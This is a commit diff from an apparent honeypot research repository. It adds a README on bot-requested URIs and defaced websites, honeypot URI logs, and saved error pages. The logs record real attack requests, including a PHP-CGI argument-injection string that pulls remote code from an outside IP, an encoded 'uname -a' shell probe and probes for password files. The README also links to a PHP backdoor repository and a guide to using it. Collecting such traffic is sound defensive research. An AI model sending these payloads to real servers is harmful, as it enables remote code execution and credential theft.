Adding new logs, and a couple examples of defaced websites

HTTP/.gitignore

@@ -1,3 +1,4 @@
 *.pcap
 cpuminer-2.3.3
 *~
+struts-pwn

HTTP/research_for_uri/interesting_uri/README.md

@@ -0,0 +1,17 @@
+#Intro
+I am currently trying to build up a list of resources from my HTTP logs that bots frequently request. To discover these resources, I comb my logs and google the URI's requested. Sometimes they can yield interesting results.
+
+I discovered that many servers around the internet get hit frequently by these URI requests, and they change according to the date. The phpmyadmin requests were by far the most numerous resource requested, (in different permutations). For some of the less requested resources, I had to look through pages and pages of google results.
+
+One of these resources lead me down a rabbit hole that lead me to...
+
+## Tangent 1
+
+While crawling the web, googling for logs that people leave available to the public, I came across an interesting thing: One website that had the <title>Mr Secretz Shell</title>. Naturally interested, I googled "Mr Secretz Shell" and found a number of defaced websites. Upon a little bit of investigation, they are an Indonesian hacker group called "Guarda Security Hacker", using a php-backdoor for some websites running vulnerable webservices. (I didn't look into which services were vulnerable.) 
+
+One google result had a defacement on top of a defacement: http://agungsucipto.co.id/shop/cart/
+This site turned up whe I googled "Mr Secretz Shell", but when investigated, was another defacement by a couple of Pakistani hacker groups, for the Pakistani Army, etc. Screenshots are included.
+
+When googling the first hacker group, "Guarda Security Hacker" turned up these two links, (one to a github user account with the exploits)[https://github.com/Yukinoshita47/php-backdoor]
+
+(and one with a guide about how to use them)[http://blog.garudasecurityhacker.org/2017/01/mr-secretz-shell-recoded-dari-shell.html]

HTTP/research_for_uri/interesting_uri/from_our_honeypots/alluri_glastopf

@@ -0,0 +1,68 @@
+:8080/admin/mysql/scripts/setup.php
+:8080/admin/phpmyadmin/scripts/setup.php
+:8080/admin/pma/scripts/setup.php
+:8080/admin/scripts/setup.php
+:8080/admin/sql/scripts/setup.php
+:8080/blog/phpmyadmin/scripts/setup.php
+:8080/database/sql/scripts/setup.php
+:8080/dbadmin/scripts/setup.php
+:8080/db/scripts/setup.php
+:8080/myadmin/scripts/setup.php
+:8080/mysql/scripts/setup.php
+:8080/phpadmin/scripts/setup.php
+:8080/phpMyAdmin2/scripts/setup.php
+:8080/phpmyadmin/scripts/setup.php
+:8080/php/phpmyadmin/scripts/setup.php
+:8080/php/scripts/setup.php
+:8080/pma/scripts/setup.php
+:8080/scripts/setup.php
+:8080/web/phpmyadmin/scripts/setup.php
+/administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
+/admin/mysql/scripts/setup.php
+/admin/phpmyadmin/scripts/setup.php
+/admin/pma/scripts/setup.php
+/admin/scripts/setup.php
+/admin/sql/scripts/setup.php
+/admn/scripts/setup.php
+/apache-default/phpmyadmin/scripts/setup.php
+/blog/phpmyadmin/scripts/setup.php
+cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
+current_config/Account1
+current_config/passwd
+/database/sql/scripts/setup.php
+/dbadmin/scripts/setup.php
+/db/scripts/setup.php
+favicon.ico
+/forum/phpmyadmin/scripts/setup.php
+/htdocs/scripts/setup.php
+http://180.163.113.82/check_proxy
+/httpdocs/scripts/setup.php
+http://httpheader.net/
+manager/html
+maque66959401/index.jsp
+meta-release-lts
+muieblackcat
+/myadmin/scripts/setup.php
+/mysql/scripts/setup.php
+ok.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
+/phpadmin/scripts/setup.php
+phpmyadmin
+/phpMyAdmin2/scripts/setup.php
+/phpmyadmin/scripts/setup.php
+phpmyadmin/scripts/setup.php
+/php/phpmyadmin/scripts/setup.php
+/php/scripts/setup.php
+/pma/scripts/setup.php
+recordings/
+redirect.php
+robots.txt
+script/live.js
+/scripts/setup.php
+shell?%75%6E%61%6D%65%20%2D%61
+sitemap.xml
+style.css
+system.ini?loginuse&loginpas
+/web/phpmyadmin/scripts/setup.php
+/websql/scripts/setup.php
+x
+/xampp/phpmyadmin/scripts/setup.php

HTTP/research_for_uri/interesting_uri/from_our_honeypots/enumerated

@@ -0,0 +1,69 @@
+      1 /:8080/admin/mysql/scripts/setup.php
+      1 /:8080/admin/phpmyadmin/scripts/setup.php
+      1 /:8080/admin/pma/scripts/setup.php
+      1 /:8080/admin/scripts/setup.php
+      1 /:8080/admin/sql/scripts/setup.php
+      1 /:8080/blog/phpmyadmin/scripts/setup.php
+      1 /:8080/database/sql/scripts/setup.php
+      1 /:8080/dbadmin/scripts/setup.php
+      1 /:8080/db/scripts/setup.php
+      1 /:8080/myadmin/scripts/setup.php
+      1 /:8080/mysql/scripts/setup.php
+      1 /:8080/phpadmin/scripts/setup.php
+      1 /:8080/phpMyAdmin2/scripts/setup.php
+      1 /:8080/phpmyadmin/scripts/setup.php
+      1 /:8080/php/scripts/setup.php
+      1 /:8080/pma/scripts/setup.php
+      1 /:8080/scripts/setup.php
+      1 /:8080/web/phpmyadmin/scripts/setup.php
+      1 //administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
+      1 //admin/mysql/scripts/setup.php
+      1 //admin/phpmyadmin/scripts/setup.php
+      1 //admin/pma/scripts/setup.php
+      1 //admin/scripts/setup.php
+      1 //admin/sql/scripts/setup.php
+      1 //admn/scripts/setup.php
+      1 //apache-default/phpmyadmin/scripts/setup.php
+      1 //database/sql/scripts/setup.php
+      1 //dbadmin/scripts/setup.php
+      1 //db/scripts/setup.php
+      1 //forum/phpmyadmin/scripts/setup.php
+      1 //htdocs/scripts/setup.php
+      1 //httpdocs/scripts/setup.php
+      1 /manager/html
+      1 /maque66959401/index.jsp
+      1 //myadmin/scripts/setup.php
+      1 //mysql/scripts/setup.php
+      1 //phpadmin/scripts/setup.php
+      1 //phpMyAdmin2/scripts/setup.php
+      1 //phpmyadmin/scripts/setup.php
+      1 //pma/scripts/setup.php
+      1 /redirect.php
+      1 /script/live.js
+      1 //scripts/setup.php
+      1 /shell?%75%6E%61%6D%65%20%2D%61
+      1 /style.css
+      1 /system.ini?loginuse&loginpas
+      1 //web/phpmyadmin/scripts/setup.php
+      1 //websql/scripts/setup.php
+      1 /x
+      1 //xampp/phpmyadmin/scripts/setup.php
+      2 /:8080/php/phpmyadmin/scripts/setup.php
+      2 //blog/phpmyadmin/scripts/setup.php
+      2 http://180.163.113.82/check_proxy
+      2 /muieblackcat
+      2 //php/scripts/setup.php
+      2 /recordings/
+      3 /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
+      3 /current_config/Account1
+      3 /ok.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
+      3 //php/phpmyadmin/scripts/setup.php
+      3 /sitemap.xml
+      4 /meta-release-lts
+      4 /phpmyadmin
+      5 /current_config/passwd
+      6 http://httpheader.net/
+      6 /robots.txt
+     13 /favicon.ico
+     13 /phpmyadmin/scripts/setup.php
+    230 /

HTTP/research_for_uri/interesting_uri/from_our_honeypots/resource

@@ -0,0 +1,25 @@
+ 159875 Requested Resource: /auth/sign_in
+    291 Requested Resource: /
+    215 Requested Resource: /assets/application.css
+    180 Requested Resource: /assets/holberton-logo-simplified.png
+    176 Requested Resource: /assets/favicon.ico
+    157 Requested Resource: /assets/application.js
+     33 Requested Resource: /gotcha.html
+     14 Requested Resource: /assets/gotcha.js
+     14 Requested Resource: /apple-touch-icon-precomposed.png
+     14 Requested Resource: /apple-touch-icon.png
+     13 Requested Resource: /admin/i18n/readme.txt
+     10 Requested Resource: /favicon.ico
+     10 Requested Resource: /basic_server.js
+      6 Requested Resource: /gotcha.php
+      4 Requested Resource: /robots.txt
+      4 Requested Resource: /public/auth/sign_in
+      4 Requested Resource: /index.html
+      3 Requested Resource: /current_config/passwd
+      3 Requested Resource: /current_config/Account1
+      2 Requested Resource: /log
+      2 Requested Resource: /img.gif
+      2 Requested Resource: /gotcha
+      2 Requested Resource: /emails/email-header.png
+      1 Requested Resource: /struts2-showcase/
+      1 Requested Resource: /gotcha.js

HTTP/research_for_uri/interesting_uri/rabbit_hole/Guarda_Hackers_Group/bellevuevaltellina_com/404.html

@@ -0,0 +1,99 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 
+<html xmlns="http://www.w3.org/1999/xhtml"> 
+<head> 
+<title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> 
+<style type="text/css"> 
+<!-- 
+body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} 
+code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} 
+.config_source code{font-size:.8em;color:#000000;} 
+pre{margin:0;font-size:1.4em;word-wrap:break-word;} 
+ul,ol{margin:10px 0 10px 5px;} 
+ul.first,ol.first{margin-top:5px;} 
+fieldset{padding:0 15px 10px 15px;word-break:break-all;} 
+.summary-container fieldset{padding-bottom:5px;margin-top:4px;} 
+legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} 
+legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; 
+font-weight:bold;font-size:1em;} 
+a:link,a:visited{color:#007EFF;font-weight:bold;} 
+a:hover{text-decoration:none;} 
+h1{font-size:2.4em;margin:0;color:#FFF;} 
+h2{font-size:1.7em;margin:0;color:#CC0000;} 
+h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} 
+h4{font-size:1.2em;margin:10px 0 5px 0; 
+}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; 
+ color:#FFF;background-color:#5C87B2; 
+}#content{margin:0 0 0 2%;position:relative;} 
+.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} 
+.content-container p{margin:0 0 10px 0; 
+}#details-left{width:35%;float:left;margin-right:2%; 
+}#details-right{width:63%;float:left;overflow:hidden; 
+}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; 
+ background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; 
+ font-size:1em;color:#FFF;text-align:right; 
+}#server_version p{margin:5px 0;} 
+table{margin:4px 0 4px 0;width:100%;border:none;} 
+td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:normal;border:none;} 
+th{width:30%;text-align:right;padding-right:2%;font-weight:bold;} 
+thead th{background-color:#ebebeb;width:25%; 
+}#details-right th{width:20%;} 
+table tr.alt td,table tr.alt th{} 
+.highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} 
+.clear{clear:both;} 
+.preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} 
+--> 
+</style> 
+
+</head> 
+<body> 
+<div id="content"> 
+<div class="content-container"> 
+  <h3>HTTP Error 404.0 - Not Found</h3> 
+  <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> 
+</div> 
+<div class="content-container"> 
+ <fieldset><h4>Most likely causes:</h4> 
+  <ul> 	<li>The directory or file specified does not exist on the Web server.</li> 	<li>The URL contains a typographical error.</li> 	<li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> 
+ </fieldset> 
+</div> 
+<div class="content-container"> 
+ <fieldset><h4>Things you can try:</h4> 
+  <ul> 	<li>Create the content on the Web server.</li> 	<li>Review the browser URL.</li> 	<li>Create a tracing rule to track failed requests for this HTTP status code and see which module is calling SetStatus. For more information about creating a tracing rule for failed requests, click <a href="http://go.microsoft.com/fwlink/?LinkID=66439">here</a>. </li> </ul> 
+ </fieldset> 
+</div> 
+
+<div class="content-container"> 
+ <fieldset><h4>Detailed Error Information:</h4> 
+  <div id="details-left"> 
+   <table border="0" cellpadding="0" cellspacing="0"> 
+    <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> 
+    <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> 
+    <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> 
+    <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> 
+
+   </table> 
+  </div> 
+  <div id="details-right"> 
+   <table border="0" cellpadding="0" cellspacing="0"> 
+    <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.bellevuevaltellina.com:80/sitemap.xml</td></tr> 
+    <tr><th>Physical Path</th><td>&nbsp;&nbsp;&nbsp;D:\inetpub\webs\bellevuevaltellinacom\sitemap.xml</td></tr> 
+    <tr class="alt"><th>Logon Method</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> 
+    <tr><th>Logon User</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> 
+    <tr class="alt"><th>Request Tracing Directory</th><td>&nbsp;&nbsp;&nbsp;D:\LogFiles\FailedReqLogFiles</td></tr> 
+   </table> 
+   <div class="clear"></div> 
+  </div> 
+ </fieldset> 
+</div> 
+
+<div class="content-container"> 
+ <fieldset><h4>More Information:</h4> 
+  This error means that the file or directory does not exist on the server. Create the file or directory and try the request again. 
+  <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,9600">View more information &raquo;</a></p> 
+
+ </fieldset> 
+</div> 
+</div> 
+</body> 
+</html> 
+

HTTP/research_for_uri/interesting_uri/rabbit_hole/Guarda_Hackers_Group/bellevuevaltellina_com/TypingText.js

@@ -0,0 +1,8 @@
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<html><head>
+<title>404 Not Found</title>
+</head><body>
+<h1>Not Found</h1>
+<p>The requested URL /js/TypingText.js was not found on this server.</p>
+</body></html>
+